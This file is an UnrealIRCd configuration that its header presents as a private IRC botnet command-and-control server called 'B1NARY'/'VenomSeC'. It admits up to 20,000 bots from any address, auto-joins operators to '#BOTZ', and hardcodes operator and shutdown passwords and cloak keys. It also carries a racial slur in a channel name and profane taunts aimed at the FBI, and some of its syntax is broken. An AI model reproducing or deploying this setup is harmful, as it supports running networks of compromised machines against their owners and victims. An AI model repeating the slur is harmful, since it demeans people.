###############################################################################1# ___ __________ ____ _______ _____ _______________.___. ___ #2# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #3# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #4# | | \ | / | \/ | \ | \\____ | #5# |______ / |___\____|__ /\____|__ /____|_ // ______| #6# \/ \/ \/ \/ \/ #7###############################################################################8#~B1NARY~ PRIVATE IRC BOTNET CONFIG | DO NOT LEAK THIS IRC BOTNET CONFIG FILE #9###############################################################################1011#########################################12############## ME BLOCK #################13#########################################14me {15name "BoT.NeT"; #SERVER NAME16info "B1NARY~ BoATNeT"; #SERVER DESCRIPTION17numeric 120;18};1920#########################################21############## ADMIN BLOCK ##############22#########################################23admin {24"B1NARY";25};2627#########################################28############## CLASS BLOCK ##############29#########################################30class clients {31pingfreq 150;32maxclients 20000;33sendq 1000000;34recvq 8000;35};3637#########################################38############## ALLOW BLOCK ##############39#########################################40allow {41ip *@*;42hostname *@*;43class clients;44maxperip 1;45};4647#########################################48############## LISTEN BLOCK #############49#########################################50listen *:6667;5152#########################################53############## OPER BLOCK ###############54#########################################55oper "B1NARY" {56from {57userhost *@*;58};59password "BOATNET";60class clients;61flags {62netadmin;63can_zline;64can_gkline;65};66};6768#########################################69############## DRPASS BLOCK #############70#########################################71drpass {72restart "Fuck.FBI.GOV";73die "Die.Fucking.Feds";74};7576#########################################77############## LOG BLOCK ################78#########################################79log ircd.log {80maxsize 50MB;81flags {82errors;83kills;84tkl;85connects;86server-connects;87oper;88sadmin-commands;89chg-commands;90oper-override;91spamfilter;92};93};9495#########################################96############## SET BLOCK ################97#########################################98set {99network-name "VenomSeC";100default-server none;101services-server "services.VenomSeC.GOV";102help-channel "#HelpThisNigga";103kline-address "[email protected]";104modes-on-connect "+xwGM";105modes-on-oper "+xwgspH";106restrict-usermodes "G";107restrict-channelmodes "G";108modes-on-join "+nust";109oper-auto-join "#BOTZ"; #CHANGE THIS110maxchannelsperuser 30;111anti-spam-quit-message-time 100s;112static-quit "Remote user closed the connection";113oper-only-stats "*";114help-channel "#HelpThisNigga";115hiddenhost-prefix "hidden";116default-bantime "0";117throttle {118connections 3;119period 60s;120};121122anti-flood {123nick-flood 50:60;124};125126spamfilter{127ban-time 1d;128ban-reason "Spam/Advertising"129virus-help-channel "#help"130}131132dns{133nameserver 127.0.0.1;134timeout 2s;135retries 2;136137);138139options {140hide-ulines;141show-connect-info;142show-opermotd;143allow-part-if-shunned;144flat-map;145fail-oper-warn;146};147148hosts {149global "ircop.VenomSeC.GOV";150coadmin "coadmin.VenomSeC.GOV";151admin "admin.VenomSeC.GOV";152servicesadmin "csops.VenomSeC.GOV";153netadmin "B1NARY.VenomSeC.GOV";154};155cloak-keys {156"SjdloajOF8304hDkjgaow";157"JME20cLt3m1k0DhFu93nyASjg51T";158"FhioefWgXDK14Su9320Giasb74A";159};160};161162#########################################163############## MISC #################164#########################################165include "help.conf";166include "badwords.channel.conf";167include "badwords.message.conf";168include "badwords.quit.conf";169include "spamfilter.conf";170loadmodule src/modules/commands.so;171loadmodule src/modules/cloak.so;172173